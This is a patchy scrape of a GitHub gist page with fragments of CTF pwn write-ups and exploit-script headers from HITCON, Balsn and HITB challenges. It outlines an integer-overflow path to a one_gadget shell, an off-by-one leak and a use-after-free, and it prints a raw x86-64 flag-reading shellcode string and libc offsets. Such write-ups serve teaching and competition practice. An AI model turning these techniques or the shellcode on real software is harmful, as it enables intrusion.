
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <liburing.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
Mipu94 / crytointheshell.md
Created October 18, 2019 17:37
Crypto in the Shell - HITCON-CTF-2019

Crypto in the Shell - HITCON-CTF-2019

The bug is an integer overflow, so we can write anywhere.

  1. To leak the key, overwrite the key, then leak it one byte at a time.
  2. After leaking the key, we leak the libc and binary addresses at 0x202360 and 0x202000.
  3. Then we leak the stack via the _argvs variable in the mmap section.
  4. We need to overwrite the return address saved on the stack with one_gadget. But we only have 32 writes, so we overwrite the variable i (of the for loop in the main function) with a negative number; then we can write more than 32 times.
  5. Brute-force byte by byte to overwrite the return address of the main function with one_gadget.
  6. Overwrite i with a big number, then exit and get the shell.
import time
Mipu94 / securenote.py
Created October 8, 2019 08:21
writeup securenote - Balsn CTF
# solves: 0 - 1000 pts
# bug: strcpy(dest, s) -> off-by-one.
# the contents of notes are xor-ed with AES hashes: MEM = content ^ hashes
# the show function prints out: contents = MEM ^ hashes
# if MEM = 0x00 => leak hashes
# the idea is to overwrite the last null byte, then use the show function to leak the hashes.
# in my solution, I try to set IV[0](counter[0]) to constant value X(heap + 0x280) then leak hashes of this IV[0]=X and turn back to IV[0]=X several times.
import time
import socket
Mipu94 / two.py
Created November 9, 2017 08:58
two-hitcon2017
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
import socket
from struct import pack,unpack
from ctypes import c_int32
import telnetlib
Mipu94 / pwn.py
Last active August 25, 2017 09:36
babystack-hitb2017.py
from customlibpwn import *
def p(m):
    """Pack the integer *m* as a 4-byte little-endian unsigned value."""
    fmt = "<I"
    return pack(fmt, m)
def u(m):
    """Unpack a 4-byte little-endian unsigned value from *m* and return it as an int."""
    (value,) = unpack("<I", m)
    return value
########################################################
# PWN! PWN! PWN!
########################################################
# This is a use-after-free challenge; to trigger the bug we need more than 10 items (0x08048DF5).
# We need to run this script several times to get a shell.
from customlibpwn import *
########################################################
# PWN! PWN! PWN!
########################################################
def change_name(name):
    """Pick menu option 3 and submit *name* at the name prompt.

    Relies on the module-level `send`/`recvu` helpers from customlibpwn
    (imported via the star import above).
    """
    menu_choice = "3"
    prompt = "what is your name?:"
    send(menu_choice)
    recvu(prompt)
    send(name)
import socket
from pwn import *
from struct import pack,unpack
from ctypes import c_int32
import telnetlib
import ctypes
import string
import os
# Character set: letters, punctuation, digits and a space.
# NOTE: `string.letters` exists only in Python 2 (it is locale-dependent there).
cs = string.letters + string.punctuation + string.digits + ' '
ascii = cs  # alias kept for existing callers; note it shadows the builtin `ascii`
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6
#open-read-write flag 32bit: hflag[H1\xf6VSH\x89\xe7j\x02X\x0f\x05P_U^jAZH1\xc0\x0f\x05H1\xc0H1\xffH\xff\xc7H\xff\xc0\x0f\x05
#32 system=0x468f0 ; binsh=0x17dbc5
import sys
sys.path.append("/home/athos/ctf/form")
from customlibpwn import *
global s
#def write_got(system,got_addr,n):
#def virtual_chunk(save_addr,bit=32)
#64bit fmt stack/bit + 6